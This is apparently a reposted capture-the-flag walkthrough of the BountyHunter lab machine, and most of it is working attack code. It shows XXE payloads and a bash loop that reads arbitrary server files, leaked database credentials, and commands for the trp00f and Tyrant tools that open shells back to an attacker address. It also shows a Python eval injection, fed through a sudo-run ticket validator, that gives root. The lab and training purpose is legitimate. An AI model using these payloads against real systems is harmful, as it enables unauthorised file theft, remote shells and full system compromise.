[Meachines] [Easy] BountyHunter XXE + TRP00F自动化权限提升+Py Bypass文件分析权限提升-EW帮帮网

Information Gathering

IP Address	Opening Ports
10.10.11.100	TCP:22,80

$ ip='10.10.11.100'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d44cf5799a79a3b0f1662552c9531fe1 (RSA)
|   256 a21e67618d2f7a37a7ba3b5108e889a6 (ECDSA)
|_  256 a57516d96958504a14117a42c1b62344 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

XXE

$ feroxbuster -u http://10.10.11.100/

http://10.10.11.100/log_submit.php

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<bugreport>
<title></title>
<cwe></cwe>
<cvss></cvss>
<reward>&ent;</reward>
</bugreport>

#!/bin/bash

while true; do
  read -p "[+] File > " file_path
  xml_payload=$(cat <<EOF
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "php://filter/read=convert.base64-encode/resource=$file_path"> ]>
<bugreport>
<title></title>
<cwe></cwe>
<cvss></cvss>
<reward>&ent;</reward>
</bugreport>
EOF
)

  encoded_payload=$(echo -n "$xml_payload" | base64 | tr -d '\n')

  encoded_payload_url=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$encoded_payload'))")

  response=$(curl -s -X POST http://10.10.11.100/tracker_diRbPr00f314.php  \
    -H "Host: 10.10.11.100" \
    -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0" \
    -H "Accept: */*" \
    -H "Accept-Language: en-US,en;q=0.5" \
    -H "Accept-Encoding: gzip, deflate" \
    -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" \
    -H "X-Requested-With: XMLHttpRequest" \
    -H "Origin: http://10.10.11.100"  \
    -H "Connection: close" \
    -H "Referer: http://10.10.11.100/log_submit.php"  \
    --data "data=$encoded_payload_url" | gzip -d)

  if [[ $response =~ ([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)? ]]; then
    base64_match=$(echo "$response" | grep -oP '([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{2}==)?')

    decoded_response=$(echo "$base64_match" | base64 -d 2>/dev/null)
    if [ $? -eq 0 ]; then
      echo "SERVER:"
      echo "$decoded_response"
    else
      echo "[!] Decode fail"
    fi
  else
    echo "[!] Not found response"
  fi
done

[+] File > db.php

username:admin
password:m19RoAU0hP41A1sTsq6K

$ ssh development@10.10.11.100

User.txt

10fd99e37ad14788c0c05a92da4dc9f3

Privilege Escalation:TRP00F && Py Bypassing Analysis

TRP00F

https://github.com/MartinxMax/trp00f

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

$ python trp00f.py --rhost 10.10.16.28 --rport 10000 --lhost 10.10.16.28 --lport 10031 --http 9999

Py Bypassing Analysis

在TRP00F中,已经告知当前用户具有SUDO权限执行/opt/skytrain_inc/ticketValidator.py

def load_file(loc):
    if loc.endswith(".md"):
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"):
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "):
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
            continue

        if x.startswith("__Ticket Code:__"):
            code_line = i+1
            continue

        if code_line and i == code_line:
            if not x.startswith("**"):
                return False
            ticketCode = x.replace("**", "").split("+")[0]
            if int(ticketCode) % 7 == 4:
                validationNumber = eval(x.replace("**", ""))
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

进入eval条件:
第一行：必须以 # Skytrain Inc 开头。
第二行：必须以 ## Ticket to 开头，并且打印出目的地。
第三行：必须包含 Ticket Code:。
第四行：必须以 ** 开头，并且包含一个可以被 eval 执行的表达式。

https://github.com/MartinxMax/Tyrant

# Skytrain Inc
## Ticket to Somewhere
__Ticket Code:__
**11+0==11 and __import__('os').system('/tmp/tyrant') == True

development@bountyhunter:/tmp$ ./tyrant -uid 0 -rhost 10.10.16.28 -rport 443

Root.txt

a51cc224d2bd3a9c103331bd01d2d51b

[Meachines] [Easy] BountyHunter XXE + TRP00F自动化权限提升+Py Bypass文件分析权限提升

Information Gathering

XXE

User.txt

Privilege Escalation:TRP00F && Py Bypassing Analysis

TRP00F

Py Bypassing Analysis

Root.txt

网站公告

今日签到

热门文章

最新发布